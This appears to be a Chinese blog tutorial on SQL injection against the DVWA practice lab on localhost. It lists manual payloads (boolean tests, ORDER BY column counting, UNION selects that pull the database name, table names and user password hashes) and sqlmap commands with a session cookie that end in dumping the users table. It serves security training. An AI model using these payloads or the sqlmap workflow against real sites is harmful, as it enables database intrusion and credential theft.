DVWA中SQL注入漏洞

 1.正确调试

1' and 1=1#

2.错误调试

1' and 1=2#

3.如何拿到用户数据

(1)判断列/字段数

1' order by 1# 

1' order by 2# 

1' order by 3#

..................... 

(2)联合查询其他信息

注 :联合查询 前后查询的列数 要对应上才行

1' union select user(),database()#

user() :返回当前数据库连接用户

database() :返回当前数据库名称

(3)联合查询表

1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#

   如果报错,可以参考这篇文章

如何解决DVWA靶场中返回的报错信息 “Illegal mix of collations for operation ‘UNION‘ ”_dvwa illegal mix of collations for operation 'unio-CSDN博客

(4)联合查询用户名和密码

1' union select user,password from users#

4.使用sqlmap

sqlmap下载官网

https://sqlmap.org/

打开sqlmap :在下载的sqlmap目录里面打开cmd,输入

python sqlmap.py

或者

在kali中直接输入sqlmap

(1)检测漏洞

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8"

      cookie 在DVWA网站里面按F12,找到网络(Network),选择第一个,在Headers里面往下翻找到Cookie,并复制。

(2)获取数据库名

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" --dbs

(3)获取指定数据库表

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa --tables

(4)获取指定数据库列/表项

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa -T users --columns

(5)获取数据

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa -T users --dump
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值